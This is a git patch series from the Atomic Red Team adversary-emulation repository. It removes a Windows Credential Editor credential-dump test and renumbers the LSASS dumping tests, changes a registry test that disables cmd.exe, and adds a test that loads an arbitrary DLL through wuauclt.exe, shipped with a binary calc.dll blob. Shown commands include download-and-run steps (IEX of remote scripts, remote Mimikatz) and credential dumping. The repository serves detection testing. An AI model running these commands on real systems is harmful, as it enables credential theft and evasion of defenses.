+  - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
+  - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+  - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+  - Atomic Test #10: Powershell Mimikatz [windows]
+  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4a7a7757..6246523d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -3587,57 +3587,6 @@ credential-access:
       - Ed Williams, Trustwave, SpiderLabs
       identifier: T1003.001
     atomic_tests:
-    - name: Windows Credential Editor
-      auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-      description: "Dump user credentials using Windows Credential Editor (supports
-        Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)\n\nUpon successful execution,
-        you should see a file with user passwords/hashes at %temp%/wce-output.file.\n\nIf
-        you see no output it is likely that execution was blocked by Anti-Virus. \n\nIf
-        you see a message saying \\\"wce.exe is not recognized as an internal or external
-        command\\\", try using the  get-prereq_commands to download and install Windows
-        Credential Editor first.\n"
-      supported_platforms:
-      - windows
-      input_arguments:
-        output_file:
-          description: Path where resulting data should be placed
-          type: Path
-          default: "%temp%\\wce-output.txt"
-        wce_zip_hash:
-          description: File hash of the Windows Credential Editor zip file
-          type: String
-          default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
-        wce_exe:
-          description: Path of Windows Credential Editor executable
-          type: Path
-          default: PathToAtomicsFolder\T1003.001\bin\wce.exe
-        wce_url:
-          description: Path to download Windows Credential Editor zip file
-          type: Url
-          default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'Windows Credential Editor must exist on disk at specified location
-          (#{wce_exe})
-
-'
-        prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-          if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-            Expand-Archive $zippath $parentpath\wce -Force
-            Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-            Remove-Item $zippath, $parentpath\wce -Recurse
-          }
-      executor:
-        command: "#{wce_exe} -o #{output_file}\n"
-        cleanup_command: del "#{output_file}" >nul 2>&1
-        name: command_prompt
-        elevation_required: true
     - name: Dump LSASS.exe Memory using ProcDump
       auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
       description: |
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 1cd19458..c4838e85 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -26,101 +26,34 @@ The following SSPs can be used to access credentials:
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Windows Credential Editor](#atomic-test-1---windows-credential-editor)
+- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
 
-- [Atomic Test #2 - Dump LSASS.exe Memory using ProcDump](#atomic-test-2---dump-lsassexe-memory-using-procdump)
+- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
 
-- [Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll)
+- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
 
-- [Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
+- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
 
-- [Atomic Test #5 - Dump LSASS.exe Memory using NanoDump](#atomic-test-5---dump-lsassexe-memory-using-nanodump)
+- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
 
-- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
+- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
 
-- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
+- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
 
-- [Atomic Test #8 - LSASS read with pypykatz](#atomic-test-8---lsass-read-with-pypykatz)
+- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
 
-- [Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-9---dump-lsassexe-memory-using-out-minidumpps1)
+- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
 
-- [Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-10---create-mini-dump-of-lsassexe-using-procdump)
+- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
 
-- [Atomic Test #11 - Powershell Mimikatz](#atomic-test-11---powershell-mimikatz)
+- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
 
-- [Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-12---dump-lsass-with-net-5-createdumpexe)
-
-- [Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-13---dump-lsassexe-using-imported-microsoft-dlls)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
 
 
 <br/>
 
-## Atomic Test #1 - Windows Credential Editor
-Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
-
-Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
-
-If you see no output it is likely that execution was blocked by Anti-Virus. 
-
-If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
-| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
-| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;wce.exe|
-| wce_url | Path to download Windows Credential Editor zip file | Url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-#{wce_exe} -o #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del "#{output_file}" >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-  Expand-Archive $zippath $parentpath\wce -Force
-  Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-  Remove-Item $zippath, $parentpath\wce -Recurse
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
+## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump.
 
@@ -179,7 +112,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
 <br/>
 <br/>
 
-## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
+## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
 
 Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
@@ -213,7 +146,7 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
+## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
 https://github.com/outflanknl/Dumpert
 https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -269,7 +202,7 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
 <br/>
 <br/>
 
-## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump
+## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
 The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
 
 https://github.com/helpsystems/nanodump
@@ -318,7 +251,7 @@ Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe0274
 <br/>
 <br/>
 
-## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
 Manager and administrative permissions.
 
@@ -352,7 +285,7 @@ Manager and administrative permissions.
 <br/>
 <br/>
 
-## Atomic Test #7 - Offline Credential Theft With Mimikatz
+## Atomic Test #6 - Offline Credential Theft With Mimikatz
 The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
 Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
 
@@ -413,7 +346,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
 <br/>
 <br/>
 
-## Atomic Test #8 - LSASS read with pypykatz
+## Atomic Test #7 - LSASS read with pypykatz
 Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
 
 Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -478,7 +411,7 @@ pip install pypykatz
 <br/>
 <br/>
 
-## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1
+## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
 The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
 powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
 Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
@@ -513,7 +446,7 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
 <br/>
 <br/>
 
-## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump
+## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
 ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
 
@@ -571,7 +504,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
 <br/>
 <br/>
 
-## Atomic Test #11 - Powershell Mimikatz
+## Atomic Test #10 - Powershell Mimikatz
 Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
 If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
 Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
@@ -607,7 +540,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
 <br/>
 <br/>
 
-## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe
+## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
 This test uses the technique describe in this tweet 
 (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
 
@@ -662,7 +595,7 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
 <br/>
 <br/>
 
-## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
 importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump 
 file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.

From e929fa518f860637f5f8cff0bdbefe312cef77fa Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 21 Mar 2022 23:56:59 +0100
Subject: [PATCH 79/83] Fix test 10 (#1823)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 25487998..b64f6baf 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -179,10 +179,10 @@ atomic_tests:
   - windows
   executor:
     command: |
-      reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+      New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
     cleanup_command: |
-      reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
-    name: command_prompt
+      Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
+    name: powershell
     elevation_required: true
 - name: Disable Windows Task Manager application
   auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62

From 3259795ba51fef1e55aab4f5d8b7794fc8bf8761 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 21 Mar 2022 22:57:34 +0000
Subject: [PATCH 80/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  2 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  2 +-
 atomics/Indexes/index.yaml                    | 10 +++++-----
 atomics/T1112/T1112.md                        | 10 +++++-----
 4 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 3e44f2c3..76bc5da5 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -482,7 +482,7 @@ defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to By
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
 defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
 defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
 defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 42ff77ea..709431ad 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -312,7 +312,7 @@ defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to By
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
 defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
 defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
 defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
 defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
 defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 6246523d..9d1479f9 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31795,15 +31795,15 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
-          /v "DisableCMD" /t REG_DWORD /d "1" /f
+        command: 'New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System"
+          -Name DisableCMD -Value 1
 
 '
-        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System"
-          /v "DisableCMD" /f >nul 2>&1
+        cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System"
+          -Name DisableCMD -ErrorAction Ignore
 
 '
-        name: command_prompt
+        name: powershell
         elevation_required: true
     - name: Disable Windows Task Manager application
       auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index cbc144da..6469fc2c 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -434,16 +434,16 @@ See example how Agent Tesla malware abuses this technique: https://any.run/repor
 
 
 
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
 
 
-```cmd
-reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
+```powershell
+New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1
 ```
 
 #### Cleanup Commands:
-```cmd
-reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1
+```powershell
+Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore
 ```
 
 

From 86e1badb67e1c4f8808ab3c934713813dbb293f2 Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Mon, 21 Mar 2022 18:14:36 -0500
Subject: [PATCH 81/83] Adding T1218 Test 10 - Load DLL with Wuauclt  (#1824)

* Create bin directory

* Add calc.dll

* Add Wuauclt dll loading

* prereq description wording update

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1218/T1218.yaml   |  28 +++++++++++++++++++++++++++-
 atomics/T1218/bin/calc.dll | Bin 0 -> 10240 bytes
 2 files changed, 27 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1218/bin/calc.dll

diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index c4141456..41c43533 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -255,4 +255,30 @@ atomic_tests:
     command: |
       #{dspath} -S #{txt_payload} 
     name: powershell
-    elevation_required: false
\ No newline at end of file
+    elevation_required: false
+- name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
+  description: |
+    This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. 
+    See https://dtm.uk/wuauclt/
+  supported_platforms:
+  - windows
+  input_arguments:
+    arbitrary_dll:
+      description: Path of DLL to be loaded
+      type: String
+      default: PathToAtomicsFolder\T1218\bin\calc.dll
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      DLL to load must exist on disk as specified location (#{arbitrary_dll})
+    prereq_command: |
+      if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+  executor:
+    command: |
+      wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+    cleanup_command: |-
+      taskkill /f /im calculator.exe > nul 2>&1
+    name: command_prompt 
diff --git a/atomics/T1218/bin/calc.dll b/atomics/T1218/bin/calc.dll
new file mode 100644
index 0000000000000000000000000000000000000000..b3a8095e593ce0c66de556a1017d04b73955a92e
GIT binary patch
literal 10240
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
